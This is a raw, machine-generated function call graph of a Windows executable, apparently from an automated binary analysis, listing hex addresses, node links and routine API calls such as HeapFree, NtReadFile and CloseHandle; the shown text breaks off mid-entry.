82418->82421 82445 7ff6d3550c7c 82418->82445 82422 7ff6d3550fea 82419->82422 82433 7ff6d3550e57 82419->82433 82420->82419 82425 7ff6d3550ce5 82420->82425 82423 7ff6d3550c07 82421->82423 82486 7ff6d37358ed 100 API calls 82422->82486 82426 7ff6d355e0e2 44 API calls 82423->82426 82428 7ff6d355daf7 42 API calls 82425->82428 82429 7ff6d3550c0f 82426->82429 82427 7ff6d3551002 82487 7ff6d37345d0 42 API calls 82427->82487 82428->82445 82431 7ff6d3550c1a HeapFree 82429->82431 82432 7ff6d3550c2d 82429->82432 82430 7ff6d355e12d 42 API calls 82436 7ff6d3550eb3 82430->82436 82431->82432 82437 7ff6d35efed0 3 API calls 82432->82437 82433->82430 82438 7ff6d355e0e2 44 API calls 82436->82438 82439 7ff6d3550c47 82437->82439 82440 7ff6d3550ebb 82438->82440 82441 7ff6d3550e2a 82439->82441 82442 7ff6d3550c50 82439->82442 82440->82427 82447 7ff6d3550ed4 82440->82447 82443 7ff6d37341f0 42 API calls 82441->82443 82444 7ff6d3550c6a HeapFree 82442->82444 82442->82445 82443->82419 82444->82445 82445->82397 82447->82447 82455 7ff6d35f9ec4 82447->82455 82448 7ff6d3550fb0 82449 7ff6d3550fd8 82448->82449 82450 7ff6d3550fb5 HeapFree 82448->82450 82449->82397 82450->82449 82451->82409 82452->82405 82453->82409 82454->82409 82456 7ff6d35f9f45 82455->82456 82457 7ff6d35f9ed9 82455->82457 82456->82448 82458 7ff6d35f9f59 82457->82458 82463 7ff6d35f9ef3 82457->82463 82460 7ff6d37341f0 42 API calls 82458->82460 82459 7ff6d35f9f40 82459->82456 82461 7ff6d37341f0 42 API calls 82459->82461 82460->82459 82462 7ff6d35f9f6f 82461->82462 82494 7ff6d35f4f77 82462->82494 82463->82459 82488 7ff6d35f3b19 82463->82488 82466 7ff6d35f9f8e 82467 7ff6d35f9fa4 82466->82467 82468 7ff6d35fa01f 82466->82468 82469 7ff6d35fa065 82467->82469 82470 7ff6d35f9fb1 82467->82470 82503 7ff6d3739539 42 API calls 82468->82503 82486->82427 82489 7ff6d35f3b30 82488->82489 82490 7ff6d35f3b4e 82488->82490 82489->82490 82491 7ff6d35f3b37 RtlReAllocateHeap 82489->82491 82492 7ff6d35f3b63 82490->82492 82493 7ff6d35efed0 3 API calls 82490->82493 82491->82492 82492->82459 82493->82492 82495 7ff6d35f4fb9 82494->82495 82496 7ff6d35f4f8d 82494->82496 82505 7ff6d3738410 WaitOnAddress GetLastError 82495->82505 82496->82466 82505->82496 82513->81772 82514->81778 82515->81786 82529 7ff6d35d9ae0 82516->82529 82519->81834 82520->81834 82525->81793 82530 7ff6d35da120 29 API calls 82529->82530 82531 7ff6d35d9b12 82530->82531 82536 7ff6d35d9b22 82531->82536 82537 7ff6d35d9bb9 82531->82537 82532 7ff6d35b5256 82532->81785 82532->81834 82533 7ff6d35d9ca7 SetLastError GetEnvironmentVariableW 82533->82537 82538 7ff6d35d9cc8 GetLastError 82533->82538 82535 7ff6d35d9b91 HeapFree 82535->82532 82536->82532 82536->82535 82539 7ff6d35d9b82 HeapFree 82536->82539 82537->82533 82541 7ff6d35d9ce1 GetLastError 82537->82541 82543 7ff6d35d9d13 82537->82543 82560 7ff6d3738330 42 API calls 82537->82560 82538->82537 82540 7ff6d35d9d8d GetLastError 82538->82540 82539->82535 82541->82537 82542 7ff6d35d9e86 82541->82542 82545 7ff6d35d9ea0 82543->82545 82546 7ff6d35d9d1c 82543->82546 82575 7ff6d37346e0 42 API calls 82545->82575 82561 7ff6d35d80a0 82546->82561 82560->82537 83121 7ff6d35d0690 83120->83121 83123 7ff6d35d06f0 83120->83123 83122 7ff6d35f3b19 4 API calls 83121->83122 83121->83123 83122->83123 83123->82339 83123->82340 83126 7ff6d3512398 83127 7ff6d35123df 83126->83127 83128 7ff6d35123fe GetLastError 83127->83128 83129 7ff6d35123e3 83127->83129 83128->83129 83130 7ff6d35226d9 83131 7ff6d3522755 83130->83131 83132 7ff6d352dcd4 83131->83132 83133 7ff6d35c292b 135 API calls 83131->83133 83134 7ff6d352277f 83133->83134 83135 7ff6d35c2fc9 198 API calls 83134->83135 83136 7ff6d3522791 memmove 83135->83136 83137 7ff6d35227b0 83136->83137 83138 7ff6d35b6cd6 366 API calls 83137->83138 83139 7ff6d35227d3 83138->83139 83140 7ff6d35227eb memmove 83139->83140 83152 7ff6d35227dc 83139->83152 83141 7ff6d34f8e23 19 API calls 83140->83141 83142 7ff6d3522810 memmove memmove 83141->83142 83622 7ff6d34f9895 83142->83622 83146 7ff6d352d791 83147 7ff6d3522871 memmove memmove memmove memmove 83148 7ff6d3522930 memmove memmove 83147->83148 83149 7ff6d352296e 83148->83149 83150 7ff6d34fff3d 112 API calls 83149->83150 83151 7ff6d352298e 83150->83151 83151->83152 83153 7ff6d34f9b47 7 API calls 83151->83153 83154 7ff6d35229c0 83153->83154 83626 7ff6d34f7b99 83154->83626 83157 7ff6d35db150 42 API calls 83159 7ff6d3522cd4 83157->83159 83158 7ff6d352d862 83160 7ff6d3734b10 42 API calls 83158->83160 83159->83158 83161 7ff6d35efed0 3 API calls 83159->83161 83162 7ff6d352d89c 83160->83162 83167 7ff6d3522d53 83161->83167 83164 7ff6d3734b10 42 API calls 83162->83164 83163 7ff6d352d776 83165 7ff6d37341f0 42 API calls 83163->83165 83166 7ff6d352d8a8 83164->83166 83168 7ff6d352d785 83165->83168 83169 7ff6d3734b10 42 API calls 83166->83169 83167->83163 83172 7ff6d35d2f94 memcmp 83167->83172 83168->83146 83170 7ff6d3734b10 42 API calls 83168->83170 83171 7ff6d352d8b4 83169->83171 83170->83146 83173 7ff6d3734b10 42 API calls 83171->83173 83174 7ff6d3522e50 83172->83174 83175 7ff6d352d8c0 83173->83175 83174->83158 83176 7ff6d3522e67 83174->83176 83177 7ff6d3734b10 42 API calls 83175->83177 83178 7ff6d3531a60 43 API calls 83176->83178 83179 7ff6d352d8cc 83177->83179 83181 7ff6d3522ed0 83178->83181 83180 7ff6d3734b10 42 API calls 83179->83180 83180->83146 83182 7ff6d35d2f94 memcmp 83181->83182 83183 7ff6d3522fac 83182->83183 83183->83162 83184 7ff6d3522fbc 83183->83184 83185 7ff6d3531a60 43 API calls 83184->83185 83186 7ff6d3523020 83185->83186 83187 7ff6d35d2f94 memcmp 83186->83187 83188 7ff6d35230cd 83187->83188 83188->83166 83189 7ff6d35230dd 83188->83189 83190 7ff6d3531a60 43 API calls 83189->83190 83191 7ff6d3523141 83190->83191 83192 7ff6d35d2f94 memcmp 83191->83192 83193 7ff6d35231fe 83192->83193 83193->83171 83194 7ff6d352320e 83193->83194 83195 7ff6d3531a60 43 API calls 83194->83195 83196 7ff6d3523272 83195->83196 83197 7ff6d35d2f94 memcmp 83196->83197 83198 7ff6d3523327 83197->83198 83199 7ff6d35d2f94 memcmp 83198->83199 83200 7ff6d3523342 83199->83200 83200->83175 83201 7ff6d3523352 83200->83201 83202 7ff6d35d2f94 memcmp 83201->83202 83203 7ff6d3523371 83202->83203 83204 7ff6d35d2f94 memcmp 83203->83204 83205 7ff6d352338c 83204->83205 83205->83168 83206 7ff6d3531a60 43 API calls 83205->83206 83207 7ff6d3523440 83206->83207 83208 7ff6d35d2f94 memcmp 83207->83208 83209 7ff6d35234fe 83208->83209 83210 7ff6d35d2f94 memcmp 83209->83210 83623 7ff6d34f98a3 83622->83623 83624 7ff6d34f98af 83622->83624 83625 7ff6d34f8e23 19 API calls 83623->83625 83624->83146 83624->83147 83625->83624 83627 7ff6d34f7b9e 83626->83627 83628 7ff6d34f7bac 83627->83628 85185 7ff6d34f87dc 6 API calls 83627->85185 83628->83146 83628->83157 83630 7ff6d34f7bcd 85186 7ff6d34f8f99 HeapFree 83630->85186 85185->83630 88497 7ff6d352a097 88498 7ff6d352a0a6 88497->88498 88499 7ff6d360fda3 63 API calls 88498->88499 88500 7ff6d352a1b9 88499->88500 88501 7ff6d360fc8b 51 API calls 88500->88501 88502 7ff6d352a1df 88501->88502 88503 7ff6d352a207 88502->88503 88504 7ff6d36116dc 43 API calls 88502->88504 88505 7ff6d352a24e HeapFree 88503->88505 88552 7ff6d3529a6f 88503->88552 88504->88503 88505->88552 88506 7ff6d352a26e HeapFree 88506->88552 88507 7ff6d35dd650 8 API calls 88507->88552 88508 7ff6d352a398 88511 7ff6d34f7f98 3 API calls 88508->88511 88509 7ff6d3529aa2 memmove 88510 7ff6d35dd900 45 API calls 88509->88510 88510->88552 88512 7ff6d352a47a 88511->88512 88515 7ff6d352a49a 88512->88515 88516 7ff6d352a484 HeapFree 88512->88516 88514 7ff6d360fc8b 51 API calls 88514->88552 88517 7ff6d3611751 HeapFree 88515->88517 88516->88515 88519 7ff6d352a4b0 88517->88519 88518 7ff6d35df580 72 API calls 88518->88552 88520 7ff6d352a4ba HeapFree 88519->88520 88524 7ff6d352a4cc 88519->88524 88520->88524 88521 7ff6d3529b68 HeapFree 88521->88552 88522 7ff6d352a5c6 88525 7ff6d352a5d0 HeapFree 88522->88525 88526 7ff6d352a5e2 88522->88526 88523 7ff6d352a593 88523->88522 88936 7ff6d34f8a64 HeapFree HeapFree HeapFree HeapFree 88523->88936 88524->88523 88933 7ff6d35e0300 47 API calls 88524->88933 88525->88526 88529 7ff6d352a5ec HeapFree 88526->88529 88530 7ff6d352a602 88526->88530 88529->88530 88534 7ff6d352d6b2 88530->88534 88536 7ff6d352a616 HeapFree 88530->88536 88537 7ff6d352a62c 88530->88537 88531 7ff6d352a570 88533 7ff6d352a57d 88531->88533 88934 7ff6d35cd7b8 HeapFree HeapFree 88531->88934 88532 7ff6d35dbdc0 63 API calls 88532->88552 88533->88523 88935 7ff6d35cd7b8 HeapFree HeapFree 88533->88935 88536->88537 88539 7ff6d352a63d HeapFree 88537->88539 88540 7ff6d352a653 88537->88540 88538 7ff6d35dd4b0 57 API calls 88538->88552 88539->88540 88542 7ff6d352a658 HeapFree 88540->88542 88543 7ff6d352a66e 88540->88543 88542->88543 88544 7ff6d35cc354 48 API calls 88543->88544 88545 7ff6d352a6a0 88544->88545 88547 7ff6d35401d0 43 API calls 88545->88547 88558 7ff6d352a6df 88547->88558 88549 7ff6d35004cb 42 API calls 88549->88558 88551 7ff6d352a7e2 88553 7ff6d352c515 88551->88553 88554 7ff6d352a802 memmove 88551->88554 88552->88506 88552->88507 88552->88508 88552->88509 88552->88514 88552->88518 88552->88521 88552->88532 88552->88538 88561 7ff6d352a40c 88552->88561 88564 7ff6d352a109 CloseHandle 88552->88564 88565 7ff6d352a0f3 HeapFree 88552->88565 88570 7ff6d3529d4b 88552->88570 88882 7ff6d3611794 88552->88882 88900 7ff6d360e5a1 88552->88900 88910 7ff6d360fda3 88552->88910 88931 7ff6d3606f5a HeapFree HeapFree 88552->88931 88557 7ff6d37392c1 43 API calls 88553->88557 88556 7ff6d3531a60 43 API calls 88554->88556 88555 7ff6d352a729 memmove 88555->88558 88560 7ff6d352a8c2 88556->88560 88766 7ff6d352bd2b 88557->88766 88558->88549 88558->88551 88558->88555 88559 7ff6d37392c1 43 API calls 88558->88559 88559->88558 88562 7ff6d352a8cc HeapFree 88560->88562 88563 7ff6d352a8e2 88560->88563 88568 7ff6d352a43a CloseHandle 88561->88568 88569 7ff6d352a424 HeapFree 88561->88569 88562->88563 88566 7ff6d352a8ec HeapFree 88563->88566 88567 7ff6d352a902 88563->88567 88564->88552 88565->88564 88566->88567 88571 7ff6d35c268b 105 API calls 88567->88571 88572 7ff6d352a44e 88568->88572 88569->88568 88570->88552 88932 7ff6d354e10c 45 API calls 88570->88932 88575 7ff6d352a934 88571->88575 88572->88508 88574 7ff6d352a458 HeapFree 88572->88574 88574->88508 88576 7ff6d35b50f7 358 API calls 88575->88576 88577 7ff6d352a93c 88576->88577 88578 7ff6d352a944 88577->88578 88579 7ff6d352d6e3 88577->88579 88580 7ff6d35e1360 56 API calls 88578->88580 88581 7ff6d3734a10 42 API calls 88579->88581 88582 7ff6d352a98f 88580->88582 88583 7ff6d352d711 88581->88583 88584 7ff6d35db520 50 API calls 88582->88584 88585 7ff6d3734b10 42 API calls 88583->88585 88586 7ff6d352a997 88584->88586 88587 7ff6d352d71d 88585->88587 88588 7ff6d35ef8a0 46 API calls 88586->88588 88590 7ff6d35efed0 3 API calls 88587->88590 88593 7ff6d352d731 88587->88593 88589 7ff6d352a9ae 88588->88589 88591 7ff6d3531a60 43 API calls 88589->88591 88590->88593 88594 7ff6d352a9f7 88591->88594 88592 7ff6d35efed0 3 API calls 88595 7ff6d352db85 88592->88595 88593->88592 88596 7ff6d352d760 88593->88596 88597 7ff6d352aa1b 88594->88597 88599 7ff6d352aa05 HeapFree 88594->88599 88967 7ff6d35b2349 HeapFree HeapFree HeapFree 88595->88967 88600 7ff6d352aa3b 88597->88600 88601 7ff6d352aa25 HeapFree 88597->88601 88599->88597 88603 7ff6d35dbdc0 63 API calls 88600->88603 88601->88600 88605 7ff6d352aa8a 88603->88605 88606 7ff6d352d3a5 88605->88606 88607 7ff6d35dc040 2 API calls 88605->88607 88611 7ff6d3734a10 42 API calls 88606->88611 88608 7ff6d352aaaf 88607->88608 88609 7ff6d352ab79 88608->88609 88610 7ff6d352aad1 88608->88610 88612 7ff6d352ab59 88609->88612 88617 7ff6d352aba4 88609->88617 88610->88612 88618 7ff6d352ab43 HeapFree 88610->88618 88622 7ff6d352ab34 HeapFree 88610->88622 88613 7ff6d352d3d3 88611->88613 88614 7ff6d35dc150 48 API calls 88612->88614 88958 7ff6d35d4fc0 42 API calls 88613->88958 88644 7ff6d352abda 88614->88644 88616 7ff6d352d398 CloseHandle 88616->88606 88617->88616 88620 7ff6d35d9700 4 API calls 88617->88620 88618->88612 88619 7ff6d352d414 88959 7ff6d35d51b0 HeapFree HeapFree 88619->88959 88620->88644 88621 7ff6d352d378 88621->88616 88625 7ff6d352d382 HeapFree 88621->88625 88622->88618 88624 7ff6d352ae9d CloseHandle 88624->88606 88627 7ff6d352aecb 88624->88627 88625->88616 88626 7ff6d352d423 88630 7ff6d37341f0 42 API calls 88626->88630 88628 7ff6d352aef9 88627->88628 88629 7ff6d352aee3 HeapFree 88627->88629 88631 7ff6d35354c9 44 API calls 88628->88631 88629->88628 88632 7ff6d352d44a 88630->88632 88633 7ff6d352af17 88631->88633 88635 7ff6d37341f0 42 API calls 88632->88635 88636 7ff6d35d2f94 memcmp 88633->88636 88634 7ff6d352d36e 88634->88621 88638 7ff6d352d459 88635->88638 88639 7ff6d352af37 88636->88639 88637 7ff6d35dc150 48 API calls 88637->88644 88960 7ff6d37345d0 42 API calls 88638->88960 88639->88583 88641 7ff6d352ad9b NtReadFile 88643 7ff6d352add1 WaitForSingleObject 88641->88643 88641->88644 88643->88644 88644->88613 88644->88616 88644->88621 88644->88624 88644->88634 88644->88637 88644->88641 88647 7ff6d352ae8e 88644->88647 88648 7ff6d35d9700 4 API calls 88644->88648 88653 7ff6d352ae7d RtlNtStatusToDosError 88644->88653 88647->88624 88660 7ff6d352dc15 88647->88660 88648->88644 88653->88647 88972 7ff6d35e2250 88882->88972 88901 7ff6d35e2250 42 API calls 88900->88901 88906 7ff6d360e5df 88901->88906 88903 7ff6d360e6cd 88903->88552 88905 7ff6d35ef8a0 46 API calls 88905->88906 88906->88903 88906->88905 88907 7ff6d360e666 memmove 88906->88907 88909 7ff6d37392c1 43 API calls 88906->88909 88976 7ff6d35d8a20 88906->88976 88986 7ff6d35fefc3 43 API calls 88906->88986 88907->88906 88908 7ff6d360e692 HeapFree 88907->88908 88908->88906 88909->88906 88989 7ff6d36107ab 88910->88989 88913 7ff6d360fe48 HeapFree 88917 7ff6d360fe6f 88913->88917 88914 7ff6d360ffe9 88914->88552 88915 7ff6d360fe16 89039 7ff6d35dd5f0 SetFilePointerEx 88915->89039 88916 7ff6d36102c9 89043 7ff6d3739299 42 API calls 88916->89043 88918 7ff6d360ec67 50 API calls 88917->88918 88921 7ff6d360ff83 88918->88921 88924 7ff6d360ec67 50 API calls 88921->88924 88930 7ff6d360ffca 88921->88930 88922 7ff6d360fdf4 88922->88913 88922->88914 88922->88917 88928 7ff6d360ffc5 88924->88928 88929 7ff6d360ec67 50 API calls 88928->88929 88928->88930 88929->88930 89042 7ff6d34f8a64 HeapFree HeapFree HeapFree HeapFree 88930->89042 88931->88552 88932->88570 88933->88531 88934->88533 88935->88523 88936->88523 88958->88619 88959->88626 88975 7ff6d35d8580 42 API calls 88972->88975 88974 7ff6d35e226f 88975->88974 88978 7ff6d35d8a3e 88976->88978 88981 7ff6d35d8a78 88976->88981 88979 7ff6d35d8b60 88978->88979 88978->88981 88987 7ff6d37345d0 42 API calls 88978->88987 88979->88981 88988 7ff6d37345d0 42 API calls 88979->88988 88981->88906 88986->88906 88990 7ff6d36107d1 88989->88990 88993 7ff6d3610896 88989->88993 88991 7ff6d3610c5c 88990->88991 88992 7ff6d36107df 88990->88992 88995 7ff6d3734b10 42 API calls 88991->88995 88994 7ff6d36107f8 88992->88994 89012 7ff6d3610811 88992->89012 88998 7ff6d3610c68 88993->88998 89000 7ff6d360fdd7 88993->89000 89001 7ff6d36108c4 88993->89001 89044 7ff6d354e10c 45 API calls 88994->89044 88995->88998 88997 7ff6d3610889 88997->88993 88997->88998 89005 7ff6d360ec67 50 API calls 88997->89005 89048 7ff6d3739299 42 API calls 88998->89048 89000->88915 89000->88916 89000->88922 89001->89000 89007 7ff6d35dd5f0 2 API calls 89001->89007 89003 7ff6d3610b7d 89047 7ff6d354e10c 45 API calls 89003->89047 89008 7ff6d3610a16 89005->89008 89011 7ff6d36109e7 89007->89011 89008->89000 89016 7ff6d35dd5f0 2 API calls 89008->89016 89009 7ff6d3610873 89010 7ff6d3531a60 43 API calls 89009->89010 89013 7ff6d361098a 89010->89013 89011->89000 89019 7ff6d35dd5f0 2 API calls 89011->89019 89012->88997 89012->89003 89012->89009 89045 7ff6d360e54e HeapAlloc GetProcessHeap HeapAlloc 89013->89045 89017 7ff6d3610a5d 89016->89017 89017->89000 89023 7ff6d360ec67 50 API calls 89017->89023 89021 7ff6d3610a8e 89019->89021 89021->89000 89024 7ff6d360ec67 50 API calls 89021->89024 89026 7ff6d3610bc2 89023->89026 89027 7ff6d3610ab7 89024->89027 89026->89000 89029 7ff6d35dd5f0 2 API calls 89026->89029 89027->89000 89027->89003 89030 7ff6d3610ae0 89027->89030 89029->88993 89032 7ff6d360ec67 50 API calls 89030->89032 89033 7ff6d3610af5 89032->89033 89033->89000 89034 7ff6d360ec67 50 API calls 89033->89034 89035 7ff6d3610b23 89034->89035 89035->89000 89036 7ff6d3610b49 89035->89036 89046 7ff6d3610d18 52 API calls 89035->89046 89036->89000 89038 7ff6d35dd5f0 2 API calls 89036->89038 89038->89000 89040 7ff6d35dd621 89039->89040 89041 7ff6d35dd629 GetLastError 89039->89041 89040->88922 89041->89040 89042->88914 89044->89000 89046->89036 89047->89000 89049 7ff6d3506e32 89656 7ff6d3501d76 89049->89656 89051 7ff6d3506e61 89052 7ff6d35078e5 HeapFree 89051->89052 89053 7ff6d35078fc 89051->89053 89052->89053 89056 7ff6d34f8868 2 API calls 89053->89056 89054 7ff6d3506e58 89054->89051 89055 7ff6d350976e 89054->89055 89058 7ff6d350978c memmove 89055->89058 89059 7ff6d3510ea4 89055->89059 89057 7ff6d3507909 89056->89057 89063 7ff6d3509d40 89057->89063 89064 7ff6d34f99a9 2 API calls 89057->89064 89061 7ff6d35097b1 HeapFree 89058->89061 89067 7ff6d35097c7 89058->89067 89060 7ff6d37392c1 43 API calls 89059->89060 89062 7ff6d3510ebe 89060->89062 89061->89067 89792 7ff6d373389f 47 API calls 89062->89792 89668 7ff6d34f9460 89063->89668 89064->89063 89066 7ff6d3509d4d 89674 7ff6d357c87b 89066->89674 89068 7ff6d3509827 89067->89068 89069 7ff6d350984e 89067->89069 89078 7ff6d35099c6 89067->89078 89068->89057 89073 7ff6d3509cfd HeapFree 89068->89073 89072 7ff6d3509cc7 89069->89072 89122 7ff6d3509857 89069->89122 89783 7ff6d3733440 50 API calls 89072->89783 89073->89057 89074 7ff6d350a700 89077 7ff6d34f98d1 2 API calls 89074->89077 89076 7ff6d3509cc5 89784 7ff6d3737c92 44 API calls 89076->89784 89080 7ff6d350a7a5 89077->89080 89078->89062 89079 7ff6d3509a97 89078->89079 89093 7ff6d35098b5 89078->89093 89781 7ff6d35019b3 55 API calls 89079->89781 89083 7ff6d355daf7 42 API calls 89080->89083 89084 7ff6d350a7b9 89083->89084 89088 7ff6d35efed0 3 API calls 89084->89088 89086 7ff6d3510eda 89086->89093 89793 7ff6d3733846 47 API calls 89086->89793 89087 7ff6d3509cb8 89087->89076 89782 7ff6d34f8ae0 HeapFree HeapFree HeapFree HeapFree 89087->89782 89102 7ff6d350a834 89088->89102 89090 7ff6d3509e92 89104 7ff6d3532a40 43 API calls 89090->89104 89093->89068 89093->89076 89093->89087 89098 7ff6d3509b66 89093->89098 89099 7ff6d3509b52 HeapFree 89093->89099 89095 7ff6d3510fea 89097 7ff6d37341f0 42 API calls 89095->89097 89100 7ff6d3510ff9 89097->89100 89665 7ff6d34f99a9 89098->89665 89099->89098 89105 7ff6d37341f0 42 API calls 89100->89105 89102->89095 89111 7ff6d35efed0 3 API calls 89102->89111 89108 7ff6d3509f17 89104->89108 89109 7ff6d3511008 89105->89109 89112 7ff6d3532a40 43 API calls 89108->89112 89119 7ff6d360fc8b 51 API calls 89108->89119 89113 7ff6d37341f0 42 API calls 89109->89113 89110 7ff6d3510f59 89118 7ff6d3511055 89110->89118 89794 7ff6d3733919 47 API calls 89110->89794 89114 7ff6d350a904 89111->89114 89112->89108 89116 7ff6d3511017 89113->89116 89123 7ff6d34f529f 48 API calls 89114->89123 89120 7ff6d37341f0 42 API calls 89116->89120 89155 7ff6d3509d5a 89119->89155 89121 7ff6d3511026 89120->89121 89124 7ff6d37341f0 42 API calls 89121->89124 89122->89086 89122->89093 89122->89110 89122->89118 89778 7ff6d35d1f0b 44 API calls 89122->89778 89779 7ff6d34fb4e9 43 API calls 89122->89779 89780 7ff6d35019b3 55 API calls 89122->89780 89126 7ff6d350a954 89123->89126 89128 7ff6d3511035 89124->89128 89131 7ff6d350a95e HeapFree 89126->89131 89134 7ff6d350a975 89126->89134 89130 7ff6d37341f0 42 API calls 89128->89130 89130->89110 89131->89134 89133 7ff6d3532a40 43 API calls 89133->89155 89134->89134 89136 7ff6d35efed0 3 API calls 89134->89136 89139 7ff6d350aa06 89136->89139 89138 7ff6d360fc8b 51 API calls 89138->89155 89139->89121 89142 7ff6d35efed0 3 API calls 89139->89142 89144 7ff6d350aac2 89142->89144 89146 7ff6d34f529f 48 API calls 89144->89146 89145 7ff6d350a5bc memmove 89147 7ff6d350a618 memmove 89145->89147 89149 7ff6d350ab12 89146->89149 89151 7ff6d350a65b memmove 89147->89151 89152 7ff6d350ab33 89149->89152 89154 7ff6d350ab1c HeapFree 89149->89154 89772 7ff6d34f9b9d 89151->89772 89158 7ff6d35efed0 3 API calls 89152->89158 89154->89152 89155->89074 89155->89090 89155->89133 89155->89138 89155->89145 89157 7ff6d34f9a14 5 API calls 89155->89157 89160 7ff6d34f9418 2 API calls 89155->89160 89161 7ff6d350a6c3 HeapFree 89155->89161 89684 7ff6d3504f51 89155->89684 89704 7ff6d34fb319 89155->89704 89708 7ff6d34f771d 89155->89708 89714 7ff6d35060dd 89155->89714 89733 7ff6d34fb2bc 89155->89733 89737 7ff6d34f7650 89155->89737 89743 7ff6d3505877 89155->89743 89762 7ff6d34fb275 89155->89762 89766 7ff6d34f75fa 89155->89766 89785 7ff6d3512410 55 API calls 89155->89785 89786 7ff6d34f9510 HeapFree HeapFree HeapFree 89155->89786 89787 7ff6d35128ca 55 API calls 89155->89787 89788 7ff6d34f8a64 HeapFree HeapFree HeapFree HeapFree 89155->89788 89789 7ff6d351266c 55 API calls 89155->89789 89790 7ff6d34f7f83 HeapFree HeapFree 89155->89790 89791 7ff6d34f9a6e HeapFree HeapFree HeapFree HeapFree 89155->89791 89157->89155 89162 7ff6d350ab7c 89158->89162 89160->89155 89161->89155 89162->89100 89163 7ff6d35efed0 3 API calls 89162->89163 89164 7ff6d350ac41 89163->89164 89165 7ff6d34f529f 48 API calls 89164->89165 89166 7ff6d350ac91 89165->89166 89167 7ff6d350acb2 89166->89167 89168 7ff6d350ac9b HeapFree 89166->89168 89169 7ff6d35efed0 3 API calls 89167->89169 89168->89167 89170 7ff6d350acfb 89169->89170 89170->89100 89170->89170 89171 7ff6d35efed0 3 API calls 89170->89171 89172 7ff6d350adc0 89171->89172 89173 7ff6d34f529f 48 API calls 89172->89173 89174 7ff6d350ae10 89173->89174 89175 7ff6d350ae31 89174->89175 89176 7ff6d350ae1a HeapFree 89174->89176 89177 7ff6d35efed0 3 API calls 89175->89177 89176->89175 89180 7ff6d350ae77 89177->89180 89178 7ff6d3510fcc 89179 7ff6d37341f0 42 API calls 89178->89179 89181 7ff6d3510fdb 89179->89181 89180->89178 89183 7ff6d35efed0 3 API calls 89180->89183 89182 7ff6d37341f0 42 API calls 89181->89182 89182->89095 89184 7ff6d350af36 89183->89184 89185 7ff6d34f529f 48 API calls 89184->89185 89186 7ff6d350af86 89185->89186 89187 7ff6d350afa7 89186->89187 89188 7ff6d350af90 HeapFree 89186->89188 89189 7ff6d35efed0 3 API calls 89187->89189 89188->89187 89190 7ff6d350aff0 89189->89190 89190->89100 89190->89190 89191 7ff6d35efed0 3 API calls 89190->89191 89192 7ff6d350b0b5 89191->89192 89193 7ff6d34f529f 48 API calls 89192->89193 89194 7ff6d350b105 89193->89194 89657 7ff6d3501da8 89656->89657 89658 7ff6d3501dcb 89656->89658 89660 7ff6d35d0681 4 API calls 89657->89660 89659 7ff6d3501df0 memmove 89658->89659 89662 7ff6d37392c1 43 API calls 89658->89662 89664 7ff6d3501e20 89658->89664 89661 7ff6d35dd4b0 57 API calls 89659->89661 89660->89658 89661->89664 89663 7ff6d3501e6f 89662->89663 89663->89659 89664->89054 89666 7ff6d34f99ca CloseHandle 89665->89666 89667 7ff6d34f99b8 HeapFree 89665->89667 89667->89666 89669 7ff6d34f89bf 89668->89669 89670 7ff6d34f9489 89668->89670 89669->89668 89671 7ff6d34f8a44 HeapFree 89669->89671 89672 7ff6d34f89f5 89669->89672 89670->89066 89671->89672 89672->89066 89673 7ff6d34f8a06 HeapFree 89672->89673 89675 7ff6d357c967 89674->89675 89676 7ff6d357c8ab 89674->89676 89677 7ff6d37341f0 42 API calls 89675->89677 89676->89675 89679 7ff6d357c934 89676->89679 89680 7ff6d35efed0 3 API calls 89676->89680 89678 7ff6d357c974 89677->89678 89679->89155 89681 7ff6d357c8da 89680->89681 89681->89675 89682 7ff6d357c8e3 89681->89682 89682->89679 89683 7ff6d3532a40 43 API calls 89682->89683 89683->89682 89685 7ff6d3504fa1 89684->89685 89686 7ff6d3531a60 43 API calls 89685->89686 89687 7ff6d3505037 89686->89687 89688 7ff6d35df580 72 API calls 89687->89688 89689 7ff6d3505055 89688->89689 89690 7ff6d35db520 50 API calls 89689->89690 89691 7ff6d35050f3 89690->89691 89692 7ff6d35df310 42 API calls 89691->89692 89693 7ff6d350510a 89692->89693 89694 7ff6d3734b10 42 API calls 89693->89694 89695 7ff6d3505843 89694->89695 89696 7ff6d3734b10 42 API calls 89695->89696 89697 7ff6d350584f 89696->89697 89698 7ff6d3734b10 42 API calls 89697->89698 89699 7ff6d350585b 89698->89699 89700 7ff6d3734950 42 API calls 89699->89700 89701 7ff6d3505867 89700->89701 89702 7ff6d37341f0 42 API calls 89701->89702 89703 7ff6d3505876 89702->89703 89705 7ff6d34fb36f 89704->89705 89706 7ff6d34fb357 89704->89706 89705->89155 89706->89705 89795 7ff6d34f9510 HeapFree HeapFree HeapFree 89706->89795 89709 7ff6d34f775f 89708->89709 89710 7ff6d34f7747 89708->89710 89711 7ff6d34f7780 89709->89711 89712 7ff6d34f7766 HeapFree 89709->89712 89710->89709 89796 7ff6d34f9510 HeapFree HeapFree HeapFree 89710->89796 89711->89155 89712->89711 89715 7ff6d3531a60 43 API calls 89714->89715 89716 7ff6d350614d 89715->89716 89717 7ff6d35df580 72 API calls 89716->89717 89718 7ff6d350616b 89717->89718 89719 7ff6d35db520 50 API calls 89718->89719 89720 7ff6d3506204 89719->89720 89721 7ff6d35df310 42 API calls 89720->89721 89722 7ff6d3506218 89721->89722 89723 7ff6d3734b10 42 API calls 89722->89723 89724 7ff6d35068b6 89723->89724 89725 7ff6d3734b10 42 API calls 89724->89725 89726 7ff6d35068c2 89725->89726 89727 7ff6d3734b10 42 API calls 89726->89727 89728 7ff6d35068ce 89727->89728 89729 7ff6d3734950 42 API calls 89728->89729 89730 7ff6d35068da 89729->89730 89731 7ff6d37341f0 42 API calls 89730->89731 89732 7ff6d35068e9 89731->89732 89734 7ff6d34fb312 89733->89734 89735 7ff6d34fb2fe 89733->89735 89734->89155 89735->89734 89797 7ff6d34f8a64 HeapFree HeapFree HeapFree HeapFree 89735->89797 89738 7ff6d34f7692 89737->89738 89739 7ff6d34f767e 89737->89739 89740 7ff6d34f76b3 89738->89740 89741 7ff6d34f7699 HeapFree 89738->89741 89739->89738 89798 7ff6d34f8a64 HeapFree HeapFree HeapFree HeapFree 89739->89798 89740->89155 89741->89740 89744 7ff6d3531a60 43 API calls 89743->89744 89745 7ff6d35058e7 89744->89745 89746 7ff6d35df580 72 API calls 89745->89746 89747 7ff6d3505905 89746->89747 89748 7ff6d35db520 50 API calls 89747->89748 89749 7ff6d350599e 89748->89749 89750 7ff6d35df310 42 API calls 89749->89750 89751 7ff6d35059b2 89750->89751 89752 7ff6d3734b10 42 API calls 89751->89752 89753 7ff6d35060a9 89752->89753 89754 7ff6d3734b10 